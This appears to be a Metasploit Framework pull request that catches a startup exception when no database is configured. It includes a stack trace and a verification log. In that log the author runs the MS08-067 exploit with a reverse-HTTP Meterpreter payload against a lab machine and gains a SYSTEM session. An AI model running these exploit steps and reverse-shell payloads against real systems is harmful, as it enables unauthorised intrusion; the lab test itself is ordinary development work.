### PR TITLE
Dumb hack to fix the no database error

### DIFF
--- a/config/environment.rb
+++ b/config/environment.rb
@@ -2,4 +2,10 @@
 require File.expand_path('../application', __FILE__)
 
 # Initialize the rails application
-Metasploit::Framework::Application.initialize!
+begin
+  Metasploit::Framework::Application.initialize!
+rescue Exception, Errno::ENOENT => e
+  $stderr.puts "[!] WARNING, the Metasploit Framework Application threw an exception:"
+  $stderr.puts "[!] #{e.inspect}"
+  $stderr.puts "[!] Try running with '-n' (no database)"
+end


### PR DESCRIPTION
If you are on a source checkout and you have never configured a database, you will get the following error when starting msfconsole:

```
$ ./msfconsole -v
/home/todb/.rvm/gems/ruby-1.9.3-p547@metasploit-framework/gems/railties-3.2.19/lib/rails/application/configuration.rb:115:in `read': No such file or directory - /home/todb/git/rapid7/metasploit-framework/config/database.yml (Errno::ENOENT)
    from /home/todb/.rvm/gems/ruby-1.9.3-p547@metasploit-framework/gems/railties-3.2.19/lib/rails/application/configuration.rb:115:in `database_configuration'
    from /home/todb/.rvm/gems/ruby-1.9.3-p547@metasploit-framework/gems/activerecord-3.2.19/lib/active_record/railtie.rb:84:in `block (2 levels) in <class:Railtie>'
    from /home/todb/.rvm/gems/ruby-1.9.3-p547@metasploit-framework/gems/activesupport-3.2.19/lib/active_support/lazy_load_hooks.rb:36:in `instance_eval'
    from /home/todb/.rvm/gems/ruby-1.9.3-p547@metasploit-framework/gems/activesupport-3.2.19/lib/active_support/lazy_load_hooks.rb:36:in `execute_hook'
    from /home/todb/.rvm/gems/ruby-1.9.3-p547@metasploit-framework/gems/activesupport-3.2.19/lib/active_support/lazy_load_hooks.rb:43:in `block in run_load_hooks'
    from /home/todb/.rvm/gems/ruby-1.9.3-p547@metasploit-framework/gems/activesupport-3.2.19/lib/active_support/lazy_load_hooks.rb:42:in `each'
    from /home/todb/.rvm/gems/ruby-1.9.3-p547@metasploit-framework/gems/activesupport-3.2.19/lib/active_support/lazy_load_hooks.rb:42:in `run_load_hooks'
    from /home/todb/.rvm/gems/ruby-1.9.3-p547@metasploit-framework/gems/activerecord-3.2.19/lib/active_record/base.rb:720:in `<top (required)>'
    from /home/todb/.rvm/gems/ruby-1.9.3-p547@metasploit-framework/gems/metasploit_data_models-0.19.4/config/initializers/arel_helper.rb:4:in `<top (required)>'
    from /home/todb/.rvm/gems/ruby-1.9.3-p547@metasploit-framework/gems/activesupport-3.2.19/lib/active_support/dependencies.rb:245:in `load'
    from /home/todb/.rvm/gems/ruby-1.9.3-p547@metasploit-framework/gems/activesupport-3.2.19/lib/active_support/dependencies.rb:245:in `block in load'
    from /home/todb/.rvm/gems/ruby-1.9.3-p547@metasploit-framework/gems/activesupport-3.2.19/lib/active_support/dependencies.rb:236:in `load_dependency'
    from /home/todb/.rvm/gems/ruby-1.9.3-p547@metasploit-framework/gems/activesupport-3.2.19/lib/active_support/dependencies.rb:245:in `load'
    from /home/todb/.rvm/gems/ruby-1.9.3-p547@metasploit-framework/gems/railties-3.2.19/lib/rails/engine.rb:593:in `block (2 levels) in <class:Engine>'
    from /home/todb/.rvm/gems/ruby-1.9.3-p547@metasploit-framework/gems/railties-3.2.19/lib/rails/engine.rb:592:in `each'
    from /home/todb/.rvm/gems/ruby-1.9.3-p547@metasploit-framework/gems/railties-3.2.19/lib/rails/engine.rb:592:in `block in <class:Engine>'
    from /home/todb/.rvm/gems/ruby-1.9.3-p547@metasploit-framework/gems/railties-3.2.19/lib/rails/initializable.rb:30:in `instance_exec'
    from /home/todb/.rvm/gems/ruby-1.9.3-p547@metasploit-framework/gems/railties-3.2.19/lib/rails/initializable.rb:30:in `run'
    from /home/todb/.rvm/gems/ruby-1.9.3-p547@metasploit-framework/gems/railties-3.2.19/lib/rails/initializable.rb:55:in `block in run_initializers'
    from /home/todb/.rvm/gems/ruby-1.9.3-p547@metasploit-framework/gems/railties-3.2.19/lib/rails/initializable.rb:54:in `each'
    from /home/todb/.rvm/gems/ruby-1.9.3-p547@metasploit-framework/gems/railties-3.2.19/lib/rails/initializable.rb:54:in `run_initializers'
    from /home/todb/.rvm/gems/ruby-1.9.3-p547@metasploit-framework/gems/railties-3.2.19/lib/rails/application.rb:136:in `initialize!'
    from /home/todb/.rvm/gems/ruby-1.9.3-p547@metasploit-framework/gems/railties-3.2.19/lib/rails/railtie/configurable.rb:30:in `method_missing'
    from /home/todb/git/rapid7/metasploit-framework/config/environment.rb:5:in `<top (required)>'
    from /home/todb/git/rapid7/metasploit-framework/lib/fastlib.rb:374:in `require'
    from /home/todb/git/rapid7/metasploit-framework/lib/fastlib.rb:374:in `require'
    from /home/todb/.rvm/gems/ruby-1.9.3-p547@metasploit-framework/gems/activesupport-3.2.19/lib/active_support/dependencies.rb:251:in `block in require'
    from /home/todb/.rvm/gems/ruby-1.9.3-p547@metasploit-framework/gems/activesupport-3.2.19/lib/active_support/dependencies.rb:236:in `load_dependency'
    from /home/todb/.rvm/gems/ruby-1.9.3-p547@metasploit-framework/gems/activesupport-3.2.19/lib/active_support/dependencies.rb:251:in `require'
    from /home/todb/.rvm/gems/ruby-1.9.3-p547@metasploit-framework/gems/railties-3.2.19/lib/rails/application.rb:103:in `require_environment!'
    from /home/todb/git/rapid7/metasploit-framework/lib/metasploit/framework/command/base.rb:68:in `require_environment!'
    from /home/todb/git/rapid7/metasploit-framework/lib/metasploit/framework/command/base.rb:86:in `start'
    from ./msfconsole:26:in `<main>'
```

This PR appears to fix as a stopgap while a more complete fix is worked up.
## Verifaction
- [ ] After merging this PR, ensure the following behavior with searching and running modules.

```
[ruby-1.9.3-p547@metasploit-framework] (fix-msfconsole-without-database) 
todb@mazikeen:~/git/rapid7/metasploit-framework
$ ./msfconsole
[!] WARNING, the Metasploit Framework Application threw an exception:
[!] #<Errno::ENOENT: No such file or directory - /home/todb/git/rapid7/metasploit-framework/config/database.yml>
[!] Try running with '-n' (no database)

[...banner....]

msf exploit(webview_addjavascriptinterface) > search ms08-067
[!] Database not connected or cache not built, using slow search

Matching Modules
================

   Name                                 Disclosure Date  Rank   Description
   ----                                 ---------------  ----   -----------
   exploit/windows/smb/ms08_067_netapi  2008-10-28       great  MS08-067 Microsoft Server Service Relative Path Stack Corruption


msf exploit(webview_addjavascriptinterface) > resource /home/todb/rc/ms08-067.rc
[*] Processing /home/todb/rc/ms08-067.rc for ERB directives.
resource (/home/todb/rc/ms08-067.rc)> sleep 3
resource (/home/todb/rc/ms08-067.rc)> use exploit/windows/smb/ms08_067_netapi
resource (/home/todb/rc/ms08-067.rc)> set rhost 192.168.145.60
rhost => 192.168.145.60
resource (/home/todb/rc/ms08-067.rc)> set lhost 192.168.145.1
lhost => 192.168.145.1
resource (/home/todb/rc/ms08-067.rc)> set payload windows/meterpreter/reverse_http
payload => windows/meterpreter/reverse_http
msf exploit(ms08_067_netapi) > exploit

[*] Started HTTP reverse handler on http://0.0.0.0:8080/
[*] Automatically detecting the target...
[*] Fingerprint: Windows 2003 - Service Pack 2 - lang:Unknown
[*] We could not detect the language pack, defaulting to English
[*] Selected Target: Windows 2003 SP2 English (NX)
[*] Attempting to trigger the vulnerability...
[*] 192.168.145.60:1293 Request received for /da6a...
[*] 192.168.145.60:1293 Staging connection for target /da6a received...
[*] Patched user-agent at offset 663656...
[*] Patched transport at offset 663320...
[*] Patched URL at offset 663384...
[*] Patched Expiration Timeout at offset 664256...
[*] Patched Communication Timeout at offset 664260...
[*] Meterpreter session 1 opened (192.168.145.1:8080 -> 192.168.145.60:1293) at 2014-08-18 12:12:00 -0500

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.145.60 - Meterpreter session 1 closed.  Reason: User exit
msf exploit(ms08_067_netapi) > 

```
